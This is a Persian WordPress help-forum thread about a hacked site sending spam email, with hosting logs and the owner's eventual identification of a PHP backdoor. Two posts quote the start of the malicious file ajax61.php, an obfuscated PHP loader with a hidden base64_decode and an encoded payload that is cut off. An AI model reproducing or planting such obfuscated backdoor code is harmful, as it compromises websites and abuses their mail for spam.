hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط JazabTarinha
      سلام دیروز سایتم مشکل نداشت و امروز مشاهده می کنم که صفحه اینطور شده و پشتیبانی تماس گرفتم میگویند فایل ایندکس پاک شده است و برای بازگرداندن همه اطلاعات حذف میشوند .
      می خواستم بدونم بدون دلیل فایل ایندکس سایت حذف می شود ؟
      و کسی میتواند بدون حذف شدن اطلاعات 1600 مطالب سایت سایت را رفع اشکال نماید ؟
      سایت مورد نظر
    • توسط mrasoul
      با عرض سلام لطفا این آدرس را ببینید .
      این لینک
      این یه پست آموزشی است که داخل آن آموزش ها به ترتیب شماره گذاری شده است و روی هر آموزش که کلیک میکنی ویدئو مربوط به اون آموزش باز میشه .
      آیا کل این ویدئو ها همه داخل یک پست قرار داره یا برای هر ویدئو پستی مجزا ساخته و فقط در قسمت فهرست آموزش لینکشو قرار داده؟
      امیدوارم منظورمو درست رسونده باشم .
    • توسط volleyworld
      سلام دوستان. من هرکاری انجام دادم نتونستم با فایل زیلا به ftp متصل بشم در صورتی که با SmartFTP Client اینکارو انجام دادم و شد، مشکل از هاست نیست. ولی این نرم افزار هم نشد کرک کنم و غیر فعال شده.

      دوستان نرم افزار دیگه ای نمیشناسن که ایمن و سریع باشه؟ یا اینکه بگه چرا فایل زیلا مشکل داره؟ در صورتی که با همون مشخصات تونستم با نرم افزار دیگه وارد شم.
    • توسط bn1376
      سلام وقت بخیر .ببخشید من یه مشکل جدی در قسمت برچسب ها و نظرات دارم! مشکل اینه که برچسب یه مطلبی روی همه ی پستای دیگه هم دسته خودش برچسب میشه ینی یه برچسب، برچسب یه دسته مطلب میشه و نظرات هم همینطوری هستن و اصلا جای خودشون قرار نمیگیرن! ممنون میشم راهنماییم کنین:) ممنون .
      سایت: sooxno.ir
      ضمیمه:مثلا اگه به تصویر زیر نگاه کنید زیر پست دوربین های سری کام برچسب های اسپیکر اومده:

    • توسط p30way
      با سلام دوستان من در حال آپدیت یک افزونه بودم که ناگهان دیدم صفحه کل سایت رفت و با این خطا مواجه شدم ، و هرکاری کردم صفحه سایت باز نشد چیکار باید بکنم ؟ 
      Fatal error: Uncaught Error: Call to undefined function get_bloginfo() in /home/pubcom/domains/..../public_html/wp-includes/class-wp-locale.php:233 Stack trace: #0 /home/pubcom/domains/..../public_html/wp-includes/class-wp-locale.php(113): WP_Locale->init() #1 /home/pubcom/domains...../public_html/wp-includes/load.php(925): WP_Locale->__construct() #2 /home/pubcom/domains..../public_html/wp-includes/load.php(208): wp_load_translations_early() #3 /home/pubcom/domains/..../public_html/wp-settings.php(63): wp_maintenance() #4 /home/pubcom/domains/...../public_html/wp-config.php(90): require_once('/home/pubcom/do...') #5 /home/pubcom/domains/...../public_html/wp-load.php(37): require_once('/home/pubcom/do...') #6 /home/pubcom/domains/...../public_html/wp-blog-header.php(13): require_once('/home/pubcom/do...') #7 /home/pubcom/domains/...../public_html/index.php(17): require('/home/pubcom/do...') #8 {main} thrown in /home/pubcom/domains/....../public_html/wp-includes/class-wp-locale.php on line 233
       
      ممنون میشم راهنمایی کنید نیاز به کمک فوری دارم . تشکر